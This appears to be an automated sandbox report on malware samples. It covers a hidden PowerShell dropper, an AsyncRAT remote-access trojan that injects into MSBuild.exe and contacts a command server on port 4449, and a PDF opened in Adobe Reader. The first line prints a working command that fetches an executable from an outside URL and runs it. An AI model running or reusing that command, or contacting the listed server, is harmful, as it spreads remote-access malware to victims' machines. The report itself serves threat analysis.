powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/damnman/damn/downloads/PUMPED_docc.exe','2d21412.exe');Start-Process '2d21412.exe'

C:\Windows\splwow64.exe

C:\Windows\splwow64.exe 12288

Network

N/A

Files

memory/2436-0-0x000000002F6C1000-0x000000002F6C2000-memory.dmp

memory/2436-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2436-2-0x0000000073C1D000-0x0000000073C28000-memory.dmp

memory/2436-4-0x0000000000490000-0x0000000000590000-memory.dmp

memory/2436-5-0x0000000000490000-0x0000000000590000-memory.dmp

memory/2436-10-0x0000000000490000-0x0000000000590000-memory.dmp

memory/2436-11-0x0000000000490000-0x0000000000590000-memory.dmp

memory/2436-9-0x0000000000490000-0x0000000000590000-memory.dmp

memory/2436-8-0x0000000000490000-0x0000000000590000-memory.dmp

memory/2436-7-0x0000000000490000-0x0000000000590000-memory.dmp

memory/2436-6-0x0000000000490000-0x0000000000590000-memory.dmp

memory/2436-14-0x0000000000490000-0x0000000000590000-memory.dmp

memory/2436-13-0x0000000073C1D000-0x0000000073C28000-memory.dmp

memory/2436-15-0x0000000000490000-0x0000000000590000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-11 02:36

Reported

2024-11-11 02:43

Platform

win7-20241023-en

Max time kernel

133s

Max time network

161s

Command Line

"C:\Users\Admin\AppData\Local\Temp\GjIEmKW.exe"

Signatures

AsyncRat

rat asyncrat

Asyncrat family

asyncrat

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1484 set thread context of 400 N/A C:\Users\Admin\AppData\Local\Temp\GjIEmKW.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\GjIEmKW.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\GjIEmKW.exe

"C:\Users\Admin\AppData\Local\Temp\GjIEmKW.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

Network

Country Destination Domain Proto
NL 45.137.65.94:4449 tcp
NL 45.137.65.94:4449 tcp
NL 45.137.65.94:4449 tcp
NL 45.137.65.94:4449 tcp
NL 45.137.65.94:4449 tcp
NL 45.137.65.94:4449 tcp

Files

memory/1484-0-0x0000000074B0E000-0x0000000074B0F000-memory.dmp

memory/1484-1-0x0000000001390000-0x0000000001438000-memory.dmp

memory/1484-2-0x0000000000410000-0x000000000041C000-memory.dmp

memory/1484-3-0x0000000000420000-0x0000000000428000-memory.dmp

memory/1484-4-0x0000000074B00000-0x00000000751EE000-memory.dmp

memory/400-8-0x0000000000400000-0x0000000000416000-memory.dmp

memory/400-13-0x0000000000400000-0x0000000000416000-memory.dmp

memory/400-17-0x0000000000400000-0x0000000000416000-memory.dmp

memory/400-15-0x0000000000400000-0x0000000000416000-memory.dmp

memory/400-19-0x0000000074B00000-0x00000000751EE000-memory.dmp

memory/1484-18-0x0000000074B00000-0x00000000751EE000-memory.dmp

memory/400-12-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/400-10-0x0000000000400000-0x0000000000416000-memory.dmp

memory/400-7-0x0000000000400000-0x0000000000416000-memory.dmp

memory/400-6-0x0000000000400000-0x0000000000416000-memory.dmp

memory/400-20-0x0000000074B00000-0x00000000751EE000-memory.dmp

memory/400-21-0x0000000074B00000-0x00000000751EE000-memory.dmp

Analysis: behavioral11

Detonation Overview

Submitted

2024-11-11 02:36

Reported

2024-11-11 02:42

Platform

win7-20240903-en

Max time kernel

117s

Max time network

131s

Command Line

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\Servicing-invoice-template.pdf"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Processes

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\Servicing-invoice-template.pdf"

Network

N/A

Files

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

MD5 b1cb39bfc00f36ca833ff0358c5384e1
SHA1 a5a5679303b0f345a67ece4e4b85c3620fdf2de9
SHA256 9933e0eb600158b9b788bef5f97ddf0872956e7595dd1ae537956dde879662d2
SHA512 5e36ae94fab428e5178ccac439b07502378db7a157145ac3f1fcecd65dfee075abff653ea2f7d1d0795a32c20b75e47dd581a9e9c898eacd808e253c62e6b3d9